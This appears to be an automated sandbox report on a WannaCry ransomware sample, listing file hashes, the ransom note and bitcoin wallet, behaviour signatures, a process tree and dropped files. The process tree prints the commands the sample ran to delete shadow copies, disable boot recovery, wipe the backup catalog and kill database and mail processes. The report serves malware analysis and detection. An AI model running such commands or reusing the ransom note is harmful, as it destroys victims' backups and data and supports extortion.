Overview

overview

10

Static

static

3

WannaCry.exe

windows7-x64

10

WannaCry.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    20-06-2024 14:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    WannaCry.exe

  • Size

    224KB

  • MD5

    5c7fb0927db37372da25f270708103a2

  • SHA1

    120ed9279d85cbfa56e5b7779ffa7162074f7a29

  • SHA256

    be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844

  • SHA512

    a15f97fad744ccf5f620e5aabb81f48507327b898a9aa4287051464019e0f89224c484e9691812e166471af9beaddcfc3deb2ba878658761f4800663beef7206

  • SSDEEP

    3072:Y059femWRwTs/dbelj0X8/j84pcRXPlU3Upt3or4H84lK8PtpLzLsR/EfcZ:+5RwTs/dSXj84mRXPemxdBlPvLzLeZ

Score
10/10
wannacrydefense_evasionexecutionimpactpersistenceransomwarespywarestealerworm

Malware Config

Extracted

Path

C:\Users\Admin\Documents\!Please Read Me!.txt

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1 Next, please find the decrypt software on your desktop, an executable file named "!WannaDecryptor!.exe". If it does not exsit, download the software from the address below. (You may need to disable your antivirus for a while.) rar password: wcry123 Run and follow the instructions! �
Wallets

15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1

Signatures

  • Wannacry

    WannaCry is a ransomware cryptoworm.

    ransomwarewormwannacry
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Drops startup file 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 4 IoCs
    ransomware
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 4 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 52 IoCs
  • Suspicious use of SendNotifyMessage 51 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\WannaCry.exe
    "C:\Users\Admin\AppData\Local\Temp\WannaCry.exe"
    1⤵
    • Drops startup file
    • Loads dropped DLL
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1044
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c 155841718895357.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1296
      • C:\Windows\SysWOW64\cscript.exe
        cscript //nologo c.vbs
        3⤵
        • Loads dropped DLL
        PID:2796
    • C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
      !WannaDecryptor!.exe f
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:2628
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im MSExchange*
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2060
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im Microsoft.Exchange.*
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2020
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im sqlserver.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2108
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im sqlwriter.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1284
    • C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
      !WannaDecryptor!.exe c
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:1628
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c start /b !WannaDecryptor!.exe v
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1268
      • C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
        !WannaDecryptor!.exe v
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2888
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1312
          • C:\Windows\SysWOW64\vssadmin.exe
            vssadmin delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:2112
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1088
    • C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
      !WannaDecryptor!.exe
      2⤵
      • Executes dropped EXE
      • Sets desktop wallpaper using registry
      • Suspicious use of SetWindowsHookEx
      PID:620
    • C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
      !WannaDecryptor!.exe
      2⤵
      • Executes dropped EXE
      • Sets desktop wallpaper using registry
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      PID:892
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1264
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1756
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
      PID:928
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\!Please Read Me!.txt
      1⤵
        PID:2224

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
        Filesize

        236KB

        MD5

        cf1416074cd7791ab80a18f9e7e219d9

        SHA1

        276d2ec82c518d887a8a3608e51c56fa28716ded

        SHA256

        78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df

        SHA512

        0bb0843a90edacaf1407e6a7273a9fbb896701635e4d9467392b7350ad25a1bec0c1ceef36737b4af5e5841936f4891436eded0533aa3d74c9a54efa42f024c5

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe.lnk
        Filesize

        921B

        MD5

        f7733d44e2671a1486aab012ac401a7f

        SHA1

        35ac14aeb4c34addc148bdafdb1f161a7e412b66

        SHA256

        b9fdfa36924c4db8395c1f7598f5d6dc2f455861c784584861cc05bbc7980d5a

        SHA512

        8b286d6a536cbe2ed7cc45b06306e6c1025a91ff66aef1f3ccaf838d7e8a5977be6807648b30d52c17e5b3206ee7ba9a228aac84f33d11811a432f8a08aab846

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\00000000.res
        Filesize

        136B

        MD5

        30223b381ded3f8b6c8e69fd7741ab99

        SHA1

        32eba9906a44668f89e99dc47671dcaa6578d1d9

        SHA256

        40ce271080b23c3a4f39d1d187636814d66a23a41b4b6e63be1d3448a01722b4

        SHA512

        89a6ff25378ed5beaa32d727456750f9d51e0d453d5a899050a2acb7f409a8186bb12525a3b5bccf7b893827ca0ef57f61ea12bcd2069eb4949a8229d72be19d

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\00000000.res
        Filesize

        136B

        MD5

        d89df611d36950c494b94b9d3f7c20e5

        SHA1

        97517e18075721e5b977ba5b68f1c6c2206f0271

        SHA256

        994afa58380a97c05ed3b33c5453fb0c43048fc1ea60fafc5ce8b3ea0226cb33

        SHA512

        919f67b8a06e702fb0fbbbaf8bca3919577de40be3c8e14e91de8a93bf343d9571bca2dfa83aaf961d7f1af6a5b7b6525d477e14c863bf41ea1eb0e830c302e6

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\00000000.res
        Filesize

        136B

        MD5

        f8a3cc61e6e83e777aaf6c181eacfa54

        SHA1

        5e4182de2d1d2da73700ecdefc0e24c9de2579e1

        SHA256

        d8255c6949cb14311d5425c90c92f0051d83be1ec665ccb1b603c036358224c9

        SHA512

        313ce84e96ec5ba079dcd347092afa4760f8adaa0561390c72762417b52baa2720dbc6e5889a15d53681525c8756fe39629e3246a6f11cc44c48d8d65d5231b0

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\00000000.res
        Filesize

        136B

        MD5

        e5b2b4fa17de567998d4c20f82adea53

        SHA1

        dba3a50f4c6eb4d961f01ceb9a4b37f94a528314

        SHA256

        3f980f26c7595c87c6f633ff1f1b05a9fef0c49ae94c57d8b519d4b9b7f68236

        SHA512

        4a349b3c74fed89f2569a806923f7af955f01fed96d145e3f1cbad3f4097881b01e0a50f175fa84ffd75e61575c1387c8e96cccf769ee7e48ded0b7353e6d96c

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\155841718895357.bat
        Filesize

        336B

        MD5

        3540e056349c6972905dc9706cd49418

        SHA1

        492c20442d34d45a6d6790c720349b11ec591cde

        SHA256

        73872a89440a2cba9d22bf4961c3d499ea2c72979c30c455f942374292fedadc

        SHA512

        c949d147100aef59e382c03abf7b162ae62a4d43456eebd730fbedcf5f95f5e1a24f6e349690d52d75331878a6ee8f6b88a7162ee9cf2a49e142196b12d0133c

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\c.vbs
        Filesize

        219B

        MD5

        5f6d40ca3c34b470113ed04d06a88ff4

        SHA1

        50629e7211ae43e32060686d6be17ebd492fd7aa

        SHA256

        0fb5039a2fe7e90cdf3f22140d7f2103f94689b15609efe0edcc8430dd772fc1

        SHA512

        4d4aa1abd2c9183202fd3f0a65b37f07ee0166ba6561f094c13c8ea59752c7bdd960e37c49583746d4464bc3b1dc0b63a1fe36a37ce7e5709cd76ed433befe35

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\c.wry
        Filesize

        628B

        MD5

        8202a5c09e9dd992c8e8b7d0db62095a

        SHA1

        62e01072de268ecd6413b422c0eb4aa7546f61ae

        SHA256

        40649d17b2c5bf5bc2b499369258394651e7f9525366e97959692f4fd57a3e6a

        SHA512

        980019e725a05e3cabb26a7595a713464fa8325afa2482e0b85614815e2da008d6afe0ce9c7c4f2da0c6c3b3fb26cfc7125f90b7dc546d5195a25e179153eec4

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\f.wry
        Filesize

        44B

        MD5

        7d36759693a88e998b131f05c778111c

        SHA1

        5d1e16571d59ec0194e1064761d8c7344bea908f

        SHA256

        e8409af301247bde396c77399bf1bd5d15b6edbb9b5ea35e4b7185a7962f387a

        SHA512

        d768cbf99d51f2393a785f67f853d406aa3c527fb57f701a64ea58195f9d752d13b6a821bf177b692528a8e30d264b575ff53594438253558b7b8a9f0a5d252c

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\m.wry
        Filesize

        42KB

        MD5

        980b08bac152aff3f9b0136b616affa5

        SHA1

        2a9c9601ea038f790cc29379c79407356a3d25a3

        SHA256

        402046ada270528c9ac38bbfa0152836fe30fb8e12192354e53b8397421430d9

        SHA512

        100cda1f795781042b012498afd783fd6ff03b0068dbd07b2c2e163cd95e6c6e00755ce16b02b017693c9febc149ed02df9df9b607e2b9cca4b07e5bd420f496

        Download Submit

      • C:\Users\Admin\Desktop\SendUnlock.gif.WCRY
        Filesize

        515KB

        MD5

        4e0ab79b63f8b3181955991909bccfff

        SHA1

        a021793be879045fb346088425ca58acddf340f8

        SHA256

        3d524f344fee5e3cb8acaf225e8fe545edef7b850acc2f45b2fcd557c11c50b9

        SHA512

        41e7524cae25bf7bf7a6d32c6a5c98a0999412730ee187dad4854677ad46c116c32511fafe0f3b246b29e536750ce3d1b5a3a67199f3ee339f1e154bf3981793

        Download Submit

      • C:\Users\Admin\Documents\!Please Read Me!.txt
        Filesize

        797B

        MD5

        afa18cf4aa2660392111763fb93a8c3d

        SHA1

        c219a3654a5f41ce535a09f2a188a464c3f5baf5

        SHA256

        227082c719fd4394c1f2311a0877d8a302c5b092bcc49f853a5cf3d2945f42b0

        SHA512

        4161f250d59b7d4d4a6c4f16639d66d21b2a9606de956d22ec00bedb006643fedbbb8e4cde9f6c0c977285918648314883ca91f3442d1125593bf2605f2d5c6b

        Download Submit

      • memory/1044-6-0x0000000010000000-0x0000000010012000-memory.dmp

        Filesize

        72KB

        Download

      • memory/1756-808-0x0000000140000000-0x00000001405E8000-memory.dmp

        Filesize

        5.9MB

        Download

      • memory/1756-812-0x0000000140000000-0x00000001405E8000-memory.dmp

        Filesize

        5.9MB

        Download

      • memory/1756-809-0x0000000140000000-0x00000001405E8000-memory.dmp

        Filesize

        5.9MB

        Download